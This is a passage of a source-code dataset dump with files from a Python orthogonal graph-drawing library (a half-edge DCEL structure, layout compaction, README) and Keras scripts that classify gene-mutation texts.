"text": "\"\"\"DCEL means Doubly connected edge list(also known as half-edge data structure).\r\nIt is a data structure to represent an embedding of a planar graph in the plane\r\n\"\"\"\r\nfrom .face import Face\r\nfrom .halfedge import HalfEdge\r\nfrom .vertex import Vertex\r\n\r\n\r\nclass Dcel:\r\n \"\"\"\r\n Build double connected edge list for a connected planar graph.\r\n Require the number of nodes greater than 1.\r\n Naming vertice with node name.\r\n Naming halfedge with (u, v).\r\n Nmming face with ('face', %d).\r\n \"\"\"\r\n\r\n def __init__(self, G, embedding):\r\n self.vertices = {}\r\n self.half_edges = {}\r\n self.faces = {}\r\n self.ext_face = None\r\n\r\n for node in G.nodes:\r\n self.vertices[node] = Vertex(node)\r\n\r\n for u, v in G.edges:\r\n he1, he2 = HalfEdge((u, v)), HalfEdge((v, u))\r\n self.half_edges[he1.id] = he1\r\n self.half_edges[he2.id] = he2\r\n he1.twin = he2\r\n he1.ori = self.vertices[u]\r\n self.vertices[u].inc = he1\r\n\r\n he2.twin = he1\r\n he2.ori = self.vertices[v]\r\n self.vertices[v].inc = he2\r\n\r\n for he in self.half_edges.values():\r\n u, v = he.get_points()\r\n he.succ = self.half_edges[embedding.next_face_half_edge(u, v)]\r\n he.succ.prev = he\r\n\r\n for he in self.half_edges.values():\r\n if not he.inc:\r\n face_id = (\"face\", len(self.faces))\r\n face = Face(face_id)\r\n face.inc = he\r\n self.faces[face_id] = face\r\n\r\n nodes_id = embedding.traverse_face(*he.get_points())\r\n for v1_id, v2_id in zip(nodes_id, nodes_id[1:]+nodes_id[:1]):\r\n other = self.half_edges[v1_id, v2_id]\r\n assert not other.inc\r\n other.inc = face\r\n\r\n if not self.faces:\r\n self.faces[('face', 0)] = Face(('face', 0))\r\n\r\n def add_node_between(self, u, node_name, v):\r\n def insert_node(u, v, mi):\r\n he = self.half_edges.pop((u, v))\r\n he1 = HalfEdge((u, mi.id))\r\n he2 = HalfEdge((mi.id, v))\r\n mi.inc = he2\r\n # update half_edges\r\n self.half_edges[u, mi.id] = he1\r\n self.half_edges[mi.id, v] = he2\r\n he1.set(None, he.ori, he.prev, he2, he.inc)\r\n he2.set(None, mi, he1, he.succ, he.inc)\r\n he1.prev.succ = he1\r\n he2.succ.prev = he2\r\n # update face\r\n if he.inc.inc is he:\r\n he.inc.inc = he1\r\n # update vertex\r\n if he.ori.inc is he:\r\n he.ori.inc = he1\r\n\r\n # update vertices\r\n mi = Vertex(node_name)\r\n self.vertices[node_name] = mi\r\n # insert\r\n insert_node(u, v, mi)\r\n insert_node(v, u, mi)\r\n for v1, v2 in ((u, mi.id), (mi.id, v)):\r\n self.half_edges[v1, v2].twin = self.half_edges[v2, v1]\r\n self.half_edges[v2, v1].twin = self.half_edges[v1, v2]\r\n\r\n def connect(self, face: Face, u, v, halfedge_side, side_uv): # u, v in same face\r\n def insert_halfedge(u, v, f, prev_he, succ_he):\r\n he = HalfEdge((u, v))\r\n self.half_edges[u, v] = he\r\n f.inc = he\r\n he.set(None, self.vertices[u], prev_he, succ_he, f)\r\n prev_he.succ = he\r\n succ_he.prev = he\r\n self.faces[f.id] = f\r\n for h in he.traverse():\r\n h.inc = f\r\n\r\n # It's true only if G is connected.\r\n face_l = Face(('face', *face.id[1:], 'l'))\r\n face_r = Face(('face', *face.id[1:], 'r'))\r\n\r\n if face.is_external:\r\n face_r.is_external = True\r\n self.ext_face = face_r\r\n\r\n hes_u = [he for he in self.vertices[u].surround_half_edges()\r\n if he.inc == face]\r\n hes_v = [he for he in self.vertices[v].surround_half_edges()\r\n if he.inc == face]\r\n\r\n # It's very important to select the right halfedge, depending on its side\r\n def select(outgoing_side, hes):\r\n if len(hes) == 1:\r\n return hes[0]\r\n\r\n side_dict = {halfedge_side[he]: he for 
he in hes}\r\n for side in [(outgoing_side + i) % 4 for i in [3, 2, 1]]:\r\n if side in side_dict:\r\n return side_dict[side]\r\n\r\n he_u = select(side_uv, hes_u)\r\n he_v = select((side_uv + 2) % 4, hes_v)\r\n\r\n prev_uv = he_u.prev\r\n succ_uv = he_v\r\n prev_vu = he_v.prev\r\n succ_vu = he_u\r\n\r\n insert_halfedge(u, v, face_r, prev_uv, succ_uv)\r\n insert_halfedge(v, u, face_l, prev_vu, succ_vu)\r\n self.half_edges[u, v].twin = self.half_edges[v, u]\r\n self.half_edges[v, u].twin = self.half_edges[u, v]\r\n self.faces.pop(face.id)\r\n\r\n def connect_diff(self, face: Face, u, v):\r\n assert type(u) != Vertex\r\n assert type(v) != Vertex\r\n\r\n def insert_halfedge(u, v, f, prev_he, succ_he):\r\n he = HalfEdge((u, v))\r\n self.half_edges[u, v] = he\r\n he.set(None, self.vertices[u], prev_he, succ_he, f)\r\n prev_he.succ = he\r\n succ_he.prev = he\r\n he_u = self.vertices[u].get_half_edge(face)\r\n he_v = self.vertices[v].get_half_edge(face)\r\n prev_uv = he_u.prev\r\n succ_uv = he_v\r\n prev_vu = he_v.prev\r\n succ_vu = he_u\r\n\r\n insert_halfedge(u, v, face, prev_uv, succ_uv)\r\n insert_halfedge(v, u, face, prev_vu, succ_vu)\r\n self.half_edges[u, v].twin = self.half_edges[v, u]\r\n self.half_edges[v, u].twin = self.half_edges[u, v]\r\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 61,
"blob_id": "d5ff544587fbe5adfceb687bc25c67ecc46dec38",
"content_id": "d4ed7f150a4c3b26c46bb9dd5b42f066fe360435",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 62,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 1,
"path": "/tsmpy/__init__.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .tsm.tsm import TSM, ortho_layout, is_bendnode, precheck\n"
},
{
"alpha_fraction": 0.5450819730758667,
"alphanum_fraction": 0.5450819730758667,
"avg_line_length": 26.11111068725586,
"blob_id": "3ba2045660cc6d5973de9cb77b0ae8fb11ad55f0",
"content_id": "8c6f122f3d8eeefdef605c37cbb598c1470f1d12",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 27,
"path": "/tsmpy/dcel/vertex.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class Vertex:\n def __init__(self, name):\n self.id = name\n self.inc = None # 'the first outgoing incident half-edge'\n\n def surround_faces(self): # clockwise, duplicated\n for he in self.surround_half_edges():\n yield he.inc\n\n def surround_half_edges(self): # clockwise\n yield self.inc\n he = self.inc.prev.twin\n while he is not self.inc:\n yield he\n he = he.prev.twin\n\n def get_half_edge(self, face):\n for he in self.surround_half_edges():\n if he.inc is face:\n return he\n raise Exception(\"not find\")\n\n def __repr__(self):\n return f'{self.id}'\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.7184934616088867,
"alphanum_fraction": 0.7440849542617798,
"avg_line_length": 26.263158798217773,
"blob_id": "a75ad904be4c0410d4d4b5ff1614e77b05980c82",
"content_id": "be70043f830b8616a83beb0b53a2788491da4091",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2071,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 76,
"path": "/README.md",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "# Introduction\n\nAn implementation of orthogonal drawing algorithm in Python\n\nMain idea comes from [A Generic Framework for the Topology-Shape-Metrics Based Layout](https://rtsys.informatik.uni-kiel.de/~biblio/downloads/theses/pkl-mt.pdf)\n\n# How to run code\n## Install requirements\n```bash\npip install -r requirements.txt\n```\n## Usage\n```Python\n# in root dir\nimport networkx as nx\nfrom tsmpy import TSM\nfrom matplotlib import pyplot as plt\n\nG = nx.Graph(nx.read_gml(\"test/inputs/case2.gml\"))\n\n# initial layout, it will be converted to an embedding\npos = {node: eval(node) for node in G}\n\n# pos is an optional, if pos is None, embedding will be given by nx.check_planarity\n\n# use linear programming to solve minimum cost flow program\ntsm = TSM(G, pos)\n\n# or use nx.min_cost_flow to solve minimum cost flow program\n# it is faster but produces worse result\n# tsm = TSM(G, pos, uselp=False)\n\ntsm.display()\nplt.savefig(\"test/outputs/case2.lp.svg\")\nplt.close()\n```\n\n## Run test\n```bash\n# show help\npython test.py -h\n\n# run all tests\npython test.py\n\n# run all tests in TestGML\npython test.py TestGML\n```\n\n# Example\n|case1|case2|\n|---|---|\n|||\n\n|bend case|grid case|\n|---|---|\n|||\n\n# Playground\nTry editing original case2 graph with [yed](https://www.yworks.com/yed-live/?file=https://gist.githubusercontent.com/uknfire/1a6782b35d066d6e59e00ed8dc0bb795/raw/eaee6eee89c48efa1c234f31fd8f9c32d237ce1e/case2)\n# Requirements for input graph\n* Planar\n* Connected\n* Max node degree is no more than 4\n* No selfloop\n\n# Features\n* Using linear programing to solve minimum-cost flow problem, to reduce number of bends\n\n\n# TODO\n- [ ] Cleaner code\n- [ ] More comments\n- [x] Fix overlay\n- [ ] Support node degree > 4\n- [x] Support cut-edges"
},
{
"alpha_fraction": 0.46285080909729004,
"alphanum_fraction": 0.4722304344177246,
"avg_line_length": 39.90634536743164,
"blob_id": "77177251e9cc257b45af0117bc245dc22cffdfa6",
"content_id": "9f83d88a697cea7969022462ccf6935a1450a15c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13540,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 331,
"path": "/tsmpy/tsm/compaction.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\nfrom .flownet import Flow_net\nfrom tsmpy.dcel import Dcel\nimport networkx as nx\n\n\nclass Compaction:\n \"\"\"\n Assign minimum lengths to the segments of the edges of the orthogonal representation.\n \"\"\"\n\n def __init__(self, ortho):\n self.planar = ortho.planar\n self.G = self.planar.G\n self.dcel = self.planar.dcel\n\n flow_dict = deepcopy(ortho.flow_dict)\n self.bend_point_processor(flow_dict)\n ori_edges = list(self.G.edges)\n halfedge_side = self.face_side_processor(flow_dict)\n self.refine_faces(halfedge_side)\n\n halfedge_length = self.tidy_rectangle_compaction(halfedge_side)\n self.pos = self.layout(halfedge_side, halfedge_length)\n self.remove_dummy()\n self.G.add_edges_from(ori_edges)\n\n def bend_point_processor(self, flow_dict):\n \"\"\"Create bend nodes. Modify self.G, self.dcel and flow_dict\"\"\"\n bends = {} # left to right\n for he in self.dcel.half_edges.values():\n lf, rf = he.twin.inc, he.inc\n flow = flow_dict[lf.id][rf.id][he.id]\n if flow > 0:\n bends[he] = flow\n\n idx = 0\n # (u, v) -> (u, bend0, bend1, ..., v)\n for he, num_bends in bends.items():\n # Q: what if there are bends on both (u, v) and (v, u)?\n # A: Impossible, not a min cost\n u, v = he.get_points()\n lf_id, rf_id = he.twin.inc.id, he.inc.id\n\n self.G.remove_edge(u, v)\n # use ('bend', idx) to represent bend node\n flow_dict[u][rf_id][u,\n ('bend', idx)] = flow_dict[u][rf_id].pop((u, v))\n\n for i in range(num_bends):\n cur_node = ('bend', idx)\n pre_node = ('bend', idx - 1) if i > 0 else u\n nxt_node = ('bend', idx + 1) if i < num_bends - 1 else v\n self.G.add_edge(pre_node, cur_node)\n self.dcel.add_node_between(\n pre_node, cur_node, v\n )\n flow_dict.setdefault(cur_node, {}).setdefault(\n lf_id, {})[cur_node, pre_node] = 1\n flow_dict.setdefault(cur_node, {}).setdefault(\n rf_id, {})[cur_node, nxt_node] = 3\n idx += 1\n\n flow_dict[v][lf_id][v,\n ('bend', idx - 1)] = flow_dict[v][lf_id].pop((v, u))\n self.G.add_edge(('bend', idx - 1), v)\n\n def refine_faces(self, halfedge_side):\n \"\"\"Make face rectangle, create dummpy nodes.\n Modify self.G, self.dcel, halfedge_side\n \"\"\"\n\n def find_front(init_he, target): # first\n cnt = 0\n for he in init_he.traverse():\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if side == next_side: # go straight\n pass\n elif (side + 1) % 4 == next_side: # go right\n cnt += 1\n elif (side + 2) % 4 == next_side: # go back\n cnt -= 2\n else: # go left\n cnt -= 1\n if cnt == target:\n return he.succ\n raise Exception(f\"can't find front edge of {init_he}\")\n\n def refine_internal(face):\n \"\"\"Insert only one edge to make face more rect\"\"\"\n for he in face.surround_half_edges():\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if side != next_side and (side + 1) % 4 != next_side:\n front_he = find_front(he, 1)\n extend_node_id = he.twin.ori.id\n\n l, r = front_he.ori.id, front_he.twin.ori.id\n he_l2r = self.dcel.half_edges[l, r]\n dummy_node_id = (\"dummy\", extend_node_id)\n self.G.remove_edge(l, r)\n self.G.add_edge(l, dummy_node_id)\n self.G.add_edge(dummy_node_id, r)\n\n face = self.dcel.half_edges[l, r].inc\n self.dcel.add_node_between(l, dummy_node_id, r)\n he_l2d = self.dcel.half_edges[l, dummy_node_id]\n he_d2r = self.dcel.half_edges[dummy_node_id, r]\n halfedge_side[he_l2d] = halfedge_side[he_l2r]\n halfedge_side[he_l2d.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n halfedge_side[he_d2r] = halfedge_side[he_l2r]\n halfedge_side[he_d2r.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n 
halfedge_side.pop(he_l2r)\n halfedge_side.pop(he_l2r.twin)\n\n self.G.add_edge(dummy_node_id, extend_node_id)\n self.dcel.connect(face, extend_node_id,\n dummy_node_id, halfedge_side, halfedge_side[he])\n\n he_e2d = self.dcel.half_edges[extend_node_id,\n dummy_node_id]\n lf, rf = he_e2d.twin.inc, he_e2d.inc\n halfedge_side[he_e2d] = halfedge_side[he]\n halfedge_side[he_e2d.twin] = (halfedge_side[he] + 2) % 4\n\n refine_internal(lf)\n refine_internal(rf)\n break\n\n def build_border(G, dcel, halfedge_side):\n \"\"\"Create border dcel\"\"\"\n border_nodes = [(\"dummy\", -i) for i in range(1, 5)]\n border_edges = [(border_nodes[i], border_nodes[(i + 1) % 4])\n for i in range(4)]\n border_G = nx.Graph(border_edges)\n border_side_dict = {}\n is_planar, border_embedding = nx.check_planarity(border_G)\n border_dcel = Dcel(border_G, border_embedding)\n ext_face = border_dcel.half_edges[(\n border_nodes[0], border_nodes[1])].twin.inc\n border_dcel.ext_face = ext_face\n ext_face.is_external = True\n\n for face in list(border_dcel.faces.values()):\n if not face.is_external:\n for i, he in enumerate(face.surround_half_edges()):\n he.inc = self.dcel.ext_face\n halfedge_side[he] = i # assign side\n halfedge_side[he.twin] = (i + 2) % 4\n border_side_dict[i] = he\n border_dcel.faces.pop(face.id)\n border_dcel.faces[self.dcel.ext_face.id] = self.dcel.ext_face\n else:\n # rename border_dcel.ext_face's name\n border_dcel.faces.pop(face.id)\n face.id = (\"face\", -1)\n border_dcel.faces[face.id] = face\n G.add_edges_from(border_edges)\n\n # merge border dcel into self.dcel\n dcel.vertices.update(border_dcel.vertices)\n dcel.half_edges.update(border_dcel.half_edges)\n dcel.faces.update(border_dcel.faces)\n dcel.ext_face.is_external = False\n dcel.ext_face = border_dcel.ext_face\n return border_side_dict\n\n ori_ext_face = self.dcel.ext_face\n border_side_dict = build_border(self.G, self.dcel, halfedge_side)\n\n for he in ori_ext_face.surround_half_edges():\n extend_node_id = he.succ.ori.id\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if next_side != side and next_side != (side + 1) % 4:\n if len(self.G[extend_node_id]) <= 2:\n front_he = border_side_dict[(side + 1) % 4]\n dummy_node_id = (\"dummy\", extend_node_id)\n l, r = front_he.ori.id, front_he.twin.ori.id\n he_l2r = self.dcel.half_edges[l, r]\n # process G\n self.G.remove_edge(l, r)\n self.G.add_edge(l, dummy_node_id)\n self.G.add_edge(dummy_node_id, r)\n self.G.add_edge(dummy_node_id, extend_node_id)\n\n # # process dcel\n\n self.dcel.add_node_between(l, dummy_node_id, r)\n self.dcel.connect_diff(\n ori_ext_face, extend_node_id, dummy_node_id)\n\n he_e2d = self.dcel.half_edges[extend_node_id,\n dummy_node_id]\n he_l2d = self.dcel.half_edges[l, dummy_node_id]\n he_d2r = self.dcel.half_edges[dummy_node_id, r]\n # process halfedge_side\n halfedge_side[he_l2d] = halfedge_side[he_l2r]\n halfedge_side[he_l2d.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n halfedge_side[he_d2r] = halfedge_side[he_l2r]\n halfedge_side[he_d2r.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n\n halfedge_side[he_e2d] = halfedge_side[he]\n halfedge_side[he_e2d.twin] = (halfedge_side[he] + 2) % 4\n halfedge_side.pop(he_l2r)\n halfedge_side.pop(he_l2r.twin)\n break\n else:\n raise Exception(\"not connected\")\n\n for face in list(self.dcel.faces.values()):\n if face.id != (\"face\", -1):\n refine_internal(face)\n\n def face_side_processor(self, flow_dict):\n \"\"\"Give flow_dict, assign halfedges with face sides\"\"\"\n\n halfedge_side = {}\n\n def set_side(init_he, 
side):\n for he in init_he.traverse():\n halfedge_side[he] = side\n angle = flow_dict[he.succ.ori.id][he.inc.id][he.succ.id]\n if angle == 1:\n # turn right in internal face or turn left in external face\n side = (side + 1) % 4\n elif angle == 3:\n side = (side + 3) % 4\n elif angle == 4: # a single edge\n side = (side + 2) % 4\n\n for he in init_he.traverse():\n if he.twin not in halfedge_side:\n set_side(he.twin, (halfedge_side[he] + 2) % 4)\n\n set_side(self.dcel.ext_face.inc, 0)\n return halfedge_side\n\n def tidy_rectangle_compaction(self, halfedge_side):\n \"\"\"\n Compute every edge's length, depending on halfedge_side\n \"\"\"\n\n def build_flow(target_side):\n flow = Flow_net()\n for he, side in halfedge_side.items():\n if side == target_side:\n lf, rf = he.twin.inc, he.inc\n lf_id = lf.id\n rf_id = rf.id if not rf.is_external else ('face', 'end')\n flow.add_edge(lf_id, rf_id, he.id)\n return flow\n\n def min_cost_flow(flow, source, sink):\n if not flow:\n return {}\n for node in flow:\n flow.nodes[node]['demand'] = 0\n flow.nodes[source]['demand'] = -2 ** 32\n flow.nodes[sink]['demand'] = 2 ** 32\n for lf_id, rf_id, he_id in flow.edges:\n # TODO: what if selfloop?\n flow.edges[lf_id, rf_id, he_id]['weight'] = 1\n flow.edges[lf_id, rf_id, he_id]['lowerbound'] = 1\n flow.edges[lf_id, rf_id, he_id]['capacity'] = 2 ** 32\n flow.add_edge(source, sink, 'extend_edge',\n weight=0, lowerbound=0, capacity=2 ** 32)\n\n return flow.min_cost_flow()\n\n hor_flow = build_flow(1) # up -> bottom\n ver_flow = build_flow(0) # left -> right\n\n hor_flow_dict = min_cost_flow(\n hor_flow, self.dcel.ext_face.id, ('face', 'end'))\n ver_flow_dict = min_cost_flow(\n ver_flow, self.dcel.ext_face.id, ('face', 'end'))\n\n halfedge_length = {}\n\n for he, side in halfedge_side.items():\n if side in (0, 1):\n rf = he.inc\n rf_id = ('face', 'end') if rf.is_external else rf.id\n lf_id = he.twin.inc.id\n\n if side == 0:\n hv_flow_dict = ver_flow_dict\n else:\n hv_flow_dict = hor_flow_dict\n\n length = hv_flow_dict[lf_id][rf_id][he.id]\n halfedge_length[he] = length\n halfedge_length[he.twin] = length\n\n return halfedge_length\n\n def layout(self, halfedge_side, halfedge_length):\n \"\"\" return pos of self.G\"\"\"\n pos = {}\n\n def set_coord(init_he, x, y):\n for he in init_he.traverse():\n pos[he.ori.id] = (x, y)\n side = halfedge_side[he]\n length = halfedge_length[he]\n if side == 1:\n x += length\n elif side == 3:\n x -= length\n elif side == 0:\n y += length\n else:\n y -= length\n\n for he in init_he.traverse():\n for e in he.ori.surround_half_edges():\n if e.twin.ori.id not in pos:\n set_coord(e, *pos[e.ori.id])\n\n set_coord(self.dcel.ext_face.inc, 0, 0)\n return pos\n\n def remove_dummy(self):\n for node in list(self.G.nodes):\n if type(node) is tuple and len(node) > 1:\n if node[0] == \"dummy\":\n self.G.remove_node(node)\n self.pos.pop(node, None)\n"
}
] | 15 |
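The tidy_rectangle_compaction step in the record above derives every edge length from a min-cost flow in which each half-edge must carry at least one unit (length >= 1), a lower bound that networkx's built-in solver does not accept directly. A minimal sketch of the standard reduction, assuming networkx and a plain DiGraph; the record's Flow_net helper keys parallel edges by half-edge id, which this sketch omits:

import networkx as nx

def min_cost_flow_with_lower_bounds(G):
    """G: DiGraph with node attr 'demand' and edge attrs
    'lowerbound', 'capacity', 'weight'."""
    H = nx.DiGraph()
    for v, data in G.nodes(data=True):
        H.add_node(v, demand=data.get("demand", 0))
    for u, v, data in G.edges(data=True):
        lb = data.get("lowerbound", 0)
        # route lb units unconditionally and solve only for the remainder:
        # u already sends lb out, v already absorbs lb in
        H.add_edge(u, v, capacity=data["capacity"] - lb, weight=data["weight"])
        H.nodes[u]["demand"] += lb
        H.nodes[v]["demand"] -= lb
    flow = nx.min_cost_flow(H)
    for u, v, data in G.edges(data=True):
        flow[u][v] += data.get("lowerbound", 0)  # add the forced units back
    return flow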
qqu0127/UCLA-CS249-Project | https://github.com/qqu0127/UCLA-CS249-Project | 20975c46c397000d1934bbcbf5014f06497b1a6a | 0c5a2e8ac36215181df2158c9b922dc1545f9d6d | 0127afeb9b92ae8b3e8305cc5e076fa34731f682 | refs/heads/master | 2021-08-23T00:54:43.259602 | 2017-12-02T00:26:08 | 2017-12-02T00:26:08 | 112,370,911 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6533622741699219,
"alphanum_fraction": 0.681995689868927,
"avg_line_length": 34.43077087402344,
"blob_id": "e59d8772f50d040251fa9a75378f4bfbdbfe3e64",
"content_id": "27a24c746bb524905213f4983aacfeed42793c2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2305,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 65,
"path": "/UCLA-CS249-Project/src/enhanced.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 22:21:28 2017\n\n@author: zhuya\n\"\"\"\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras import optimizers \n\ntrain_code = np.hstack((truncated_one_hot_gene[:train_size], truncated_one_hot_variation[:train_size]))\ntest_code = np.hstack((truncated_one_hot_gene[train_size:], truncated_one_hot_variation[train_size:]))\ntotal_code = np.concatenate((train_code, test_code), axis=0)\ntotal_text_arrays = np.concatenate((text_train_arrays,text_test_arrays),axis = 0)\n\ndef dictionary_model():\n model = Sequential()\n model.add(Dense(256, input_dim= Gene_INPUT_DIM*2, init='normal', activation='relu'))\n model.add(Dropout(0.3))\n model.add(Dense(512, init='normal', activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(200, init='normal', activation='linear'))\n \n #optimizer = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) original type\n optimizer = optimizers.Adadelta(lr=3, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='mean_squared_error', optimizer=optimizer)\n return model\n\ndicmodel = dictionary_model()\ndicmodel.summary()\nbest_loss = 1e300\nfor i in range(20):\n estimator = dicmodel.fit(total_code, total_text_arrays, epochs=5, batch_size=64)\n dic_loss = dicmodel.evaluate(x = test_code, y=text_test_arrays)\n print(\"\")\n print(\"test loss: %.4f\" % dic_loss)\n if (dic_loss < best_loss):\n best_loss = dic_loss\n dicmodel.save_weights('best_weight.h5')\n\nprint(\"best loss: %.4f\" % best_loss)\n\n\ndicmodel.load_weights('best_weight.h5')\ntrain_text_predict = dicmodel.predict(train_code)\ntest_text_predict = dicmodel.predict(test_code)\n\ntmp_distance = np.zeros((train_size))\ndic_train_id = np.zeros((train_size, 50))\ndic_test_id = np.zeros((test_size, 50))\n\nfor i in range(train_size):\n for j in range(train_size):\n tmp_distance[j] = np.sqrt(np.sum(np.square(train_text_predict[i] - text_train_arrays[j])))\n tmp_sort = np.argsort(tmp_distance)\n dic_train_id[i] = tmp_sort[:50]\n\n\nfor i in range(test_size):\n for j in range(train_size):\n tmp_distance[j] = np.sqrt(np.sum(np.square(test_text_predict[i] - text_train_arrays[j])))\n tmp_sort = np.argsort(tmp_distance)\n dic_test_id[i] = tmp_sort[:50] \n"
},
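The two quadratic loops at the end of enhanced.py above collect, for every predicted text embedding, the ids of the 50 closest training texts by Euclidean distance. A sketch of the same lookup with scikit-learn's NearestNeighbors (assumed available; the helper name is illustrative):

from sklearn.neighbors import NearestNeighbors

def nearest_text_ids(predicted, text_train_arrays, k=50):
    nn = NearestNeighbors(n_neighbors=k, metric="euclidean")
    nn.fit(text_train_arrays)
    _, idx = nn.kneighbors(predicted)  # idx[i]: the k nearest training rows
    return idx

# dic_train_id = nearest_text_ids(train_text_predict, text_train_arrays)
# dic_test_id  = nearest_text_ids(test_text_predict,  text_train_arrays)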
{
"alpha_fraction": 0.6230126619338989,
"alphanum_fraction": 0.6585825681686401,
"avg_line_length": 32.745452880859375,
"blob_id": "7ef4e4a09b44f7ac1d1cbae7db7f357275c6123e",
"content_id": "ed66e39b07fd4bd45fcf7212e9eb6ee88bfc6b60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3711,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 110,
"path": "/UCLA-CS249-Project/src/classification.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 22:50:07 2017\n\n@author: zhuya\n\"\"\"\n#import word_embedding as we \n\nimport pandas as pd\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras import optimizers \n\ndef baseline_model():\n model = Sequential()\n model.add(Dense(256, input_dim=Text_INPUT_DIM+ Gene_INPUT_DIM*2, init='normal', activation='relu'))\n model.add(Dropout(0.3))\n model.add(Dense(256, init='normal', activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(80, init='normal', activation='relu'))\n model.add(Dense(9, init='normal', activation=\"softmax\"))\n \n #optimizer = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) original type\n optimizer = optimizers.Adadelta(lr=0.5, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\nmodel = baseline_model()\nmodel.summary()\n'''\nbest_acc = 0\nfor i in range(30):\n estimator=model.fit(train_set, encoded_y, validation_split=0.2, epochs=2, batch_size=64)\n if (best_acc < estimator.history['val_acc'][-1] * 100):\n best_acc = estimator.history['val_acc'][-1] * 100\n model.save_weights('best_weight_predict_all.h5')\n \nprint(\"Training accuracy: %.2f%% / Best validation accuracy: %.2f%%\" % (100*estimator.history['acc'][-1], best_acc))\n'''\nmodel.load_weights('best_weight_predict_all.h5')\n'''\nimport matplotlib.pyplot as plt\nplt.plot(estimator.history['acc'])\nplt.plot(estimator.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'valid'], loc='upper left')\nplt.show()\n\n# summarize history for loss\nplt.plot(estimator.history['loss'])\nplt.plot(estimator.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'valid'], loc='upper left')\nplt.show()\n'''\n#predict for the new data\ny_pred = model.predict_proba(test_set) # [N, 9] probability\n\n#enha\nn = 50\n\na = 0.2\ny_predict_final = np.zeros((test_size, 9))\ny_predict_final += y_pred * (1 - a);\n\nfor i in range(test_size):\n for j in range(n):\n y_predict_final[i] += a/n * encoded_y[int(dic_test_id[i][j])]\n\n\n'''\ntrain_totaldata = np.zeros((train_size, 9 * (n+1)))\ntest_totaldata = np.zeros((test_size, 9 * (n+1)))\nfor i in range (train_size):\n train_totaldata[i][:9] = encoded_y[i]\n for j in range (n):\n train_totaldata[i][9 + j * 9 : 9 + (j + 1) * 9] = encoded_y[int(dic_train_id[i][j])]\n\nfor i in range (test_size):\n test_totaldata[i][:9] = y_pred[i]\n for j in range (n):\n test_totaldata[i][9 + j * 9 : 9 + (j + 1) * 9] = encoded_y[int(dic_test_id[i][j])]\n\ndef weight_model():\n model = Sequential()\n model.add(Dense(256, input_dim = 9 * (n+1), init='normal', activation='relu')) \n model.add(Dense(9, init='normal', activation=\"softmax\"))\n optimizer = optimizers.Adadelta(lr=0.5, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\nweightmodel = weight_model()\nweightmodel.summary()\nbest_acc = 0\nfor i in range(100):\n estimator = weightmodel.fit(train_totaldata, encoded_y, validation_split=0.2, epochs=1, batch_size=64)\n if (best_acc < estimator.history['val_acc'][-1] * 100):\n best_acc = estimator.history['val_acc'][-1] * 100\n #weightmodel.save_weights('best_weight_final.h5')\n \nprint(\"Training accuracy: %.2f%% / Best validation accuracy: %.2f%%\" % 
(100*estimator.history['acc'][-1], best_acc))\n#weightmodel.load_weights('best_weight_final.h5')\ny_predict_final = weightmodel.predict_proba(test_totaldata)\n'''"
},
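The "#enha" block in classification.py mixes the network's predicted class probabilities with the label distribution of the 50 nearest training documents found in enhanced.py. The same computation vectorised, as a numpy sketch (a is the neighbour weight from the script; encoded_y must be a numpy array):

import numpy as np

def blend_with_neighbours(y_pred, encoded_y, dic_test_id, a=0.2, n=50):
    # fancy indexing gives one (n, 9) one-hot stack per test row
    neighbour_labels = encoded_y[dic_test_id[:, :n].astype(int)]  # (N, n, 9)
    return (1 - a) * y_pred + (a / n) * neighbour_labels.sum(axis=1)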
{
